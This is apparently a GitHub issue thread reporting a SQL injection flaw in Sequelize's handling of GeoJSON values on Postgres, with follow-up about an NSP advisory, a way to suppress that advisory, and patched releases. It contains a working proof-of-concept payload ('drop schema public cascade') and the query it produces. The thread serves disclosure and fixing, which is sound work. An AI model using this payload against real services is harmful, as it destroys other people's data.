SQL Injection/Syntax error inserting GeoJSON documents with single quotes

[yocontra]

What you are doing?

Inserting inserting GeoJSON documents with single quotes in an attribute.

What do you expect to happen?

No errors.

What is actually happening?

Errors.

Executing (default): INSERT INTO "boundaries" ("id","name","type","geo","createdAt","updatedAt") VALUES ('0138248','Jacksons'' Gap','place',ST_GeomFromGeoJSON('{"type":"MultiPolygon","properties":{"NAME":"Jacksons' Gap","NAMELSAD":"Jacksons' Gap town","coordinates":[]}'),'2016-06-30 20:45:23.143 +00:00','2016-06-30 20:45:23.143 +00:00') RETURNING *;

SequelizeDatabaseError: syntax error at or near "Gap"

Seems like the GeoJSON string is not being escaped at all, so having a single quote in any property in the GeoJSON is causing a syntax error

Dialect: postgres
Database version: 9.5.3
Sequelize version: 3.23.4

[yocontra]

Just to be more clear: This is a pretty major security issue. Anyone who accepts user data with geojson types is vulnerable to a SQL injection on the insert.

[yocontra]

Proof of concept:

{
  "type": "MultiPolygon",
  "properties": {
    "exploit": "'); drop schema public cascade; -- "
  },
  "coordinates": []
}

Send this object to any Sequelize-backed service as the value of a GeoJSON type and it will drop the entire database - not good!

Query generated by Sequelize:

INSERT INTO "boundaries" ("geo") VALUES (ST_GeomFromGeoJSON('{"type":"MultiPolygon","properties":{"exploit": "'); drop schema public cascade; -- "},"coordinates":[]}')) RETURNING *;

[PizzaBrandon]

This is now listed in NSP as a critical vulnerability and breaks all builds that use nsp during CI. https://nodesecurity.io/advisories/122

[yocontra]

@PizzaBrandon

• Vulnerability isn't in PostGIS or Postgres via ST_GeomFromGeoJSON, its solely on sequelize to do the escaping before passing the value to the DB.
• Validation won't help since this works in valid GeoJSON

[pdehaan]

FWIW, you can set up an nsp exception for this by adding an .nsprc file with something like the following:

{
  "exceptions": [
    "https://nodesecurity.io/advisories/122" // SQL Injection via GeoJSON
  ]
}

[mickhansen]

Fix released in v3.23.5

[sushantdhiman]

Now both MySQL and Postgres SQL Injection cases has been fixed. Everyone is advised to upgrade to v3.23.6

@contra You need to edit the NSP advisory with patch version v3.23.6

More details #6302 and #6305